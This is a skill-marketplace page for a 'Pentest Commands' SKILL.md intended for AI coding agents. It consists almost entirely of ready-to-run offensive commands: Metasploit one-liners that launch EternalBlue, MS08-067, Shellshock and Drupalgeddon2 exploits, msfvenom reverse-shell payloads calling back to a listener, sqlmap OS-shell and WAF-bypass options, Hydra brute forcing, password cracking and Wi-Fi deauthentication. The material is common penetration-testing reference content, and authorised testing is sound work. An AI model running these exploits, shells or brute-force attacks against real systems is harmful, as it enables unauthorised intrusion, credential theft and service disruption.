How do I install Pentest Commands?

Install Pentest Commands with a single command: npx mdskills install sickn33/pentest-commands. This downloads the skill files into your project and your AI agent picks them up automatically.

What platforms support Pentest Commands?

Pentest Commands works with Claude Code, Claude Desktop, Cursor, Vscode Copilot, Windsurf, Continue Dev, Codex, Gemini Cli, Amp, Roo Code, Goose, Opencode, Trae, Qodo, Command Code. Skills use the open SKILL.md format which is compatible with any AI coding agent that reads markdown instructions.

← Back to skills

Pentest Commands

Name: Pentest Commands: AI Agent Skill
Rating: 7 (1 reviews)
Author: sickn33

Verified

SecurityIntermediate

This skill should be used when the user asks to "run pentest commands", "scan with nmap", "use metasploit exploits", "crack passwords with hydra or john", "scan web vulnerabilities with nikto", "enumerate networks", or needs essential penetration testing command references.

by @sickn330Updated 2 weeks ago

Add this skill

npx mdskills install sickn33/pentest-commands

Fork & Edit

Skill Advisor7.0

Comprehensive pentesting command reference with well-organized tool coverage and clear examples

+Provides extensive, well-categorized commands across major pentesting tools
+Includes practical examples and quick reference tables for common scenarios
+Clearly states authorization requirements and constraints upfront
-Lacks agent-specific trigger conditions or decision logic for when to use which tool
-Commands execute directly without validation or safety checks on user inputs

SKILL.md

Edit in Browser

1---
2name: Pentest Commands
3description: This skill should be used when the user asks to "run pentest commands", "scan with nmap", "use metasploit exploits", "crack passwords with hydra or john", "scan web vulnerabilities with nikto", "enumerate networks", or needs essential penetration testing command references.
4metadata:
5  author: zebbern
6  version: "1.1"
7---
8 
9# Pentest Commands
10 
11## Purpose
12 
13Provide a comprehensive command reference for penetration testing tools including network scanning, exploitation, password cracking, and web application testing. Enable quick command lookup during security assessments.
14 
15## Inputs/Prerequisites
16 
17- Kali Linux or penetration testing distribution
18- Target IP addresses with authorization
19- Wordlists for brute forcing
20- Network access to target systems
21- Basic understanding of tool syntax
22 
23## Outputs/Deliverables
24 
25- Network enumeration results
26- Identified vulnerabilities
27- Exploitation payloads
28- Cracked credentials
29- Web vulnerability findings
30 
31## Core Workflow
32 
33### 1. Nmap Commands
34 
35**Host Discovery:**
36 
37```bash
38# Ping sweep
39nmap -sP 192.168.1.0/24
40 
41# List IPs without scanning
42nmap -sL 192.168.1.0/24
43 
44# Ping scan (host discovery)
45nmap -sn 192.168.1.0/24
46```
47 
48**Port Scanning:**
49 
50```bash
51# TCP SYN scan (stealth)
52nmap -sS 192.168.1.1
53 
54# Full TCP connect scan
55nmap -sT 192.168.1.1
56 
57# UDP scan
58nmap -sU 192.168.1.1
59 
60# All ports (1-65535)
61nmap -p- 192.168.1.1
62 
63# Specific ports
64nmap -p 22,80,443 192.168.1.1
65```
66 
67**Service Detection:**
68 
69```bash
70# Service versions
71nmap -sV 192.168.1.1
72 
73# OS detection
74nmap -O 192.168.1.1
75 
76# Comprehensive scan
77nmap -A 192.168.1.1
78 
79# Skip host discovery
80nmap -Pn 192.168.1.1
81```
82 
83**NSE Scripts:**
84 
85```bash
86# Vulnerability scan
87nmap --script vuln 192.168.1.1
88 
89# SMB enumeration
90nmap --script smb-enum-shares -p 445 192.168.1.1
91 
92# HTTP enumeration
93nmap --script http-enum -p 80 192.168.1.1
94 
95# Check EternalBlue
96nmap --script smb-vuln-ms17-010 192.168.1.1
97 
98# Check MS08-067
99nmap --script smb-vuln-ms08-067 192.168.1.1
100 
101# SSH brute force
102nmap --script ssh-brute -p 22 192.168.1.1
103 
104# FTP anonymous
105nmap --script ftp-anon 192.168.1.1
106 
107# DNS brute force
108nmap --script dns-brute 192.168.1.1
109 
110# HTTP methods
111nmap -p80 --script http-methods 192.168.1.1
112 
113# HTTP headers
114nmap -p80 --script http-headers 192.168.1.1
115 
116# SQL injection check
117nmap --script http-sql-injection -p 80 192.168.1.1
118```
119 
120**Advanced Scans:**
121 
122```bash
123# Xmas scan
124nmap -sX 192.168.1.1
125 
126# ACK scan (firewall detection)
127nmap -sA 192.168.1.1
128 
129# Window scan
130nmap -sW 192.168.1.1
131 
132# Traceroute
133nmap --traceroute 192.168.1.1
134```
135 
136### 2. Metasploit Commands
137 
138**Basic Usage:**
139 
140```bash
141# Launch Metasploit
142msfconsole
143 
144# Search for exploits
145search type:exploit name:smb
146 
147# Use exploit
148use exploit/windows/smb/ms17_010_eternalblue
149 
150# Show options
151show options
152 
153# Set target
154set RHOST 192.168.1.1
155 
156# Set payload
157set PAYLOAD windows/meterpreter/reverse_tcp
158 
159# Run exploit
160exploit
161```
162 
163**Common Exploits:**
164 
165```bash
166# EternalBlue
167msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOST 192.168.1.1; exploit"
168 
169# MS08-067 (Conficker)
170msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 192.168.1.1; exploit"
171 
172# vsftpd backdoor
173msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST 192.168.1.1; exploit"
174 
175# Shellshock
176msfconsole -x "use exploit/linux/http/apache_mod_cgi_bash_env_exec; set RHOST 192.168.1.1; exploit"
177 
178# Drupalgeddon2
179msfconsole -x "use exploit/unix/webapp/drupal_drupalgeddon2; set RHOST 192.168.1.1; exploit"
180 
181# PSExec
182msfconsole -x "use exploit/windows/smb/psexec; set RHOST 192.168.1.1; set SMBUser user; set SMBPass pass; exploit"
183```
184 
185**Scanners:**
186 
187```bash
188# TCP port scan
189msfconsole -x "use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.0/24; run"
190 
191# SMB version scan
192msfconsole -x "use auxiliary/scanner/smb/smb_version; set RHOSTS 192.168.1.0/24; run"
193 
194# SMB share enumeration
195msfconsole -x "use auxiliary/scanner/smb/smb_enumshares; set RHOSTS 192.168.1.0/24; run"
196 
197# SSH brute force
198msfconsole -x "use auxiliary/scanner/ssh/ssh_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run"
199 
200# FTP brute force
201msfconsole -x "use auxiliary/scanner/ftp/ftp_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run"
202 
203# RDP scanning
204msfconsole -x "use auxiliary/scanner/rdp/rdp_scanner; set RHOSTS 192.168.1.0/24; run"
205```
206 
207**Handler Setup:**
208 
209```bash
210# Multi-handler for reverse shells
211msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.2; set LPORT 4444; exploit"
212```
213 
214**Payload Generation (msfvenom):**
215 
216```bash
217# Windows reverse shell
218msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > shell.exe
219 
220# Linux reverse shell
221msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf
222 
223# PHP reverse shell
224msfvenom -p php/reverse_php LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php
225 
226# ASP reverse shell
227msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f asp > shell.asp
228 
229# WAR file
230msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f war > shell.war
231 
232# Python payload
233msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.2 LPORT=4444 -f raw > shell.py
234```
235 
236### 3. Nikto Commands
237 
238```bash
239# Basic scan
240nikto -h http://192.168.1.1
241 
242# Comprehensive scan
243nikto -h http://192.168.1.1 -C all
244 
245# Output to file
246nikto -h http://192.168.1.1 -output report.html
247 
248# Plugin-based scans
249nikto -h http://192.168.1.1 -Plugins robots
250nikto -h http://192.168.1.1 -Plugins shellshock
251nikto -h http://192.168.1.1 -Plugins heartbleed
252nikto -h http://192.168.1.1 -Plugins ssl
253 
254# Export to Metasploit
255nikto -h http://192.168.1.1 -Format msf+
256 
257# Specific tuning
258nikto -h http://192.168.1.1 -Tuning 1  # Interesting files only
259```
260 
261### 4. SQLMap Commands
262 
263```bash
264# Basic injection test
265sqlmap -u "http://192.168.1.1/page?id=1"
266 
267# Enumerate databases
268sqlmap -u "http://192.168.1.1/page?id=1" --dbs
269 
270# Enumerate tables
271sqlmap -u "http://192.168.1.1/page?id=1" -D database --tables
272 
273# Dump table
274sqlmap -u "http://192.168.1.1/page?id=1" -D database -T users --dump
275 
276# OS shell
277sqlmap -u "http://192.168.1.1/page?id=1" --os-shell
278 
279# POST request
280sqlmap -u "http://192.168.1.1/login" --data="user=admin&pass=test"
281 
282# Cookie injection
283sqlmap -u "http://192.168.1.1/page" --cookie="id=1*"
284 
285# Bypass WAF
286sqlmap -u "http://192.168.1.1/page?id=1" --tamper=space2comment
287 
288# Risk and level
289sqlmap -u "http://192.168.1.1/page?id=1" --risk=3 --level=5
290```
291 
292### 5. Hydra Commands
293 
294```bash
295# SSH brute force
296hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1
297 
298# FTP brute force
299hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.1
300 
301# HTTP POST form
302hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
303 
304# HTTP Basic Auth
305hydra -l admin -P passwords.txt 192.168.1.1 http-get /admin/
306 
307# SMB brute force
308hydra -l admin -P passwords.txt smb://192.168.1.1
309 
310# RDP brute force
311hydra -l admin -P passwords.txt rdp://192.168.1.1
312 
313# MySQL brute force
314hydra -l root -P passwords.txt mysql://192.168.1.1
315 
316# Username list
317hydra -L users.txt -P passwords.txt ssh://192.168.1.1
318```
319 
320### 6. John the Ripper Commands
321 
322```bash
323# Crack password file
324john hash.txt
325 
326# Specify wordlist
327john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
328 
329# Show cracked passwords
330john hash.txt --show
331 
332# Specify format
333john hash.txt --format=raw-md5
334john hash.txt --format=nt
335john hash.txt --format=sha512crypt
336 
337# SSH key passphrase
338ssh2john id_rsa > ssh_hash.txt
339john ssh_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
340 
341# ZIP password
342zip2john file.zip > zip_hash.txt
343john zip_hash.txt
344```
345 
346### 7. Aircrack-ng Commands
347 
348```bash
349# Monitor mode
350airmon-ng start wlan0
351 
352# Capture packets
353airodump-ng wlan0mon
354 
355# Target specific network
356airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
357 
358# Deauth attack
359aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon
360 
361# Crack WPA handshake
362aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
363```
364 
365### 8. Wireshark/Tshark Commands
366 
367```bash
368# Capture traffic
369tshark -i eth0 -w capture.pcap
370 
371# Read capture file
372tshark -r capture.pcap
373 
374# Filter by protocol
375tshark -r capture.pcap -Y "http"
376 
377# Filter by IP
378tshark -r capture.pcap -Y "ip.addr == 192.168.1.1"
379 
380# Extract HTTP data
381tshark -r capture.pcap -Y "http" -T fields -e http.request.uri
382```
383 
384## Quick Reference
385 
386### Common Port Scans
387 
388```bash
389# Quick scan
390nmap -F 192.168.1.1
391 
392# Full comprehensive
393nmap -sV -sC -A -p- 192.168.1.1
394 
395# Fast with version
396nmap -sV -T4 192.168.1.1
397```
398 
399### Password Hash Types
400 
401| Mode | Type |
402|------|------|
403| 0 | MD5 |
404| 100 | SHA1 |
405| 1000 | NTLM |
406| 1800 | sha512crypt |
407| 3200 | bcrypt |
408| 13100 | Kerberoast |
409 
410## Constraints
411 
412- Always have written authorization
413- Some scans are noisy and detectable
414- Brute forcing may lock accounts
415- Rate limiting affects tools
416 
417## Examples
418 
419### Example 1: Quick Vulnerability Scan
420 
421```bash
422nmap -sV --script vuln 192.168.1.1
423```
424 
425### Example 2: Web App Test
426 
427```bash
428nikto -h http://target && sqlmap -u "http://target/page?id=1" --dbs
429```
430 
431## Troubleshooting
432 
433| Issue | Solution |
434|-------|----------|
435| Scan too slow | Increase timing (-T4, -T5) |
436| Ports filtered | Try different scan types |
437| Exploit fails | Check target version compatibility |
438| Passwords not cracking | Try larger wordlists, rules |
439

Full transparency — inspect the skill content before installing.